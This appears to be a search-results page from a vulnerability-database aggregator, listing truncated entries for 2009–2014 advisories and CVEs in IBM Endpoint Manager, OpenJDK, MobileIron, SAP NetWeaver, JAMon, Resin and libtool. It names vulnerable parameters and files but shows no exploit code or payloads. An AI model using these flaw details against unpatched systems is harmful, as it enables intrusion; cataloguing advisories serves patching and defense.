193 matches found
[RT-SA-2014-012] Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components
Advisory: Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components During a penetration test, RedTeam Pentesting discovered that several IBM Endpoint Manager Components are based on Ruby on Rails and use static secrettoken values. With these values,...
Google Releases Open Source XSS Web App Scanner
UPDATE: A previous version of this story incorrectly reported that Firing Range is a scanner when in reality Firing Range is a tool that tests Web application security scanners. Google today released to open source tool called Firing Range, which is designed as a test bed for Web application...
MGASA-2014-0422 Updated java-1.7.0-openjdk packages fix security vulnerabilities
Multiple flaws were discovered in the Libraries, 2D, and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions CVE-2014-6506, CVE-2014-6531, CVE-2014-6502, CVE-2014-6511, CVE-2014-6504, CVE-2014-6519. It was...
MobileIron Virtual Smartphone Platform Privilege Escalation Exploit
No description provided by source. MobileIron Virtual Smartphone Platform Privilege Escalation Exploit 0day ======================================================================== The MobileIron Virtual Smartphone Platform is the first solution to combine data-driven smartphone and tablet...
CVE-2014-3133
SAP Netweaver Java Application Server does not properly restrict access, which allows remote attackers to obtain the list of SAP systems registered on an SLD via an unspecified webdynpro, related to SystemSelection...
Design/Logic Flaw
SAP Netweaver Java Application Server does not properly restrict access, which allows remote attackers to obtain the list of SAP systems registered on an SLD via an unspecified webdynpro, related to SystemSelection...
CVE-2014-3133
SAP Netweaver Java Application Server does not properly restrict access, which allows remote attackers to obtain the list of SAP systems registered on an SLD via an unspecified webdynpro, related to SystemSelection...
CVE-2013-6235
Multiple cross-site scripting XSS vulnerabilities in JAMon Java Application Monitor 2.7 and earlier allow remote attackers to inject arbitrary web script or HTML via the 1 listenertype or 2 currentlistener parameter to mondetail.jsp or ArraySQL parameter to 3 mondetail.jsp, 4 jamonadmin.jsp, 5...
CVE-2013-6235
Multiple cross-site scripting XSS vulnerabilities in JAMon Java Application Monitor 2.7 and earlier allow remote attackers to inject arbitrary web script or HTML via the 1 listenertype or 2 currentlistener parameter to mondetail.jsp or ArraySQL parameter to 3 mondetail.jsp, 4 jamonadmin.jsp, 5...
CVE-2013-6235
CVE-2013-6235 refers to multiple reflected XSS vulnerabilities in JAMon (Java Application Monitor) v2.7 and earlier. The flaw allows remote attackers to inject arbitrary script/HTML via unsanitized input in parameters such as listenertype and currentlistener (in mondetail.jsp) and ArraySQL (in mo...
CVE-2013-6235
Multiple cross-site scripting XSS vulnerabilities in JAMon Java Application Monitor 2.7 and earlier allow remote attackers to inject arbitrary web script or HTML via the 1 listenertype or 2 currentlistener parameter to mondetail.jsp or ArraySQL parameter to 3 mondetail.jsp, 4 jamonadmin.jsp, 5...
JAMon 2.7 Cross Site Scripting
Advisory Information Title: Multiple Reflected XSS vulnerabilities in JAMon Date published: 2013-01-23 Date of last update: 2013-01-23 Vendors contacted: JAMon v 2.7 Discovered by: Christian Catalano Severity: Low 02. Vulnerability Information CVE reference: CVE-2013-6235 CVSS v2 Base Score:...
Oracle Linux 5 : gcc / and / gcc4 (ELSA-2010-0039)
The remote Oracle Linux 5 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2010-0039 advisory. 4.1.2-46.el54.2 - fix libjava to avoid opening .la/dlopening .so files from current working directory or subdirectories thereof 545672, CVE-2009-3736 Tenable ha...
Scientific Linux Security Update : java-1.6.0-openjdk on SL5.x, SL6.x i386/x86_64 (20130703)
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption. CVE-2013-2470, CVE-2013-2471, CVE-2013-247...
Resin Application Server 4.0.36 XSS / Source Code Disclosure
Resin Application Server version 4.0.36 suffers from a cross site scripting / source code disclosure vulnerabilities. Resin Application Server 4.0.36 Cross-Site Scripting Vulnerabilities Vendor: Caucho Technology, Inc. Product web page: http://www.caucho.com Affected version: Resin Professional...
MobileIron Virtual Smartphone Platform - Privilege Escalation
MobileIron Virtual Smartphone Platform Privilege Escalation Exploit 0day ======================================================================== The MobileIron Virtual Smartphone Platform is the first solution to combine data-driven smartphone and tablet management with real-time wireless cost...
Resin Application Server 4.0.36 Source Code Disclosure
Resin Application Server 4.0.36 Source Code Disclosure Vulnerability Vendor: Caucho Technology, Inc. Product web page: http://www.caucho.com Affected version: Resin Professional Web And Application Server 4.0.36 Summary: Resin is the Java Application Server for high traffic sites that require spe...
CentOS Update for java CESA-2013:0770 centos5
The remote host is missing an update for the SPDX-FileCopyrightText: 2013 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
Eucalyptus Cloud Controller Console Detection
The web console for Eucalyptus Cloud Controller, a Java application that implements an interface compatible with Amazon's EC2, was found on the remote host. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid61610; scriptversion"1.3"; scriptcvsdate"Date: 2019/11/25";...
Scientific Linux Security Update : gcc and gcc4 on SL3.x, SL4.x, SL5.x i386/x86_64
CVE-2009-3736 libtool: libltdl may load and execute code from a library in the current directory A flaw was found in the way GNU Libtool's libltdl library looked for libraries to load. It was possible for libltdl to load a malicious library from the current working directory. In certain...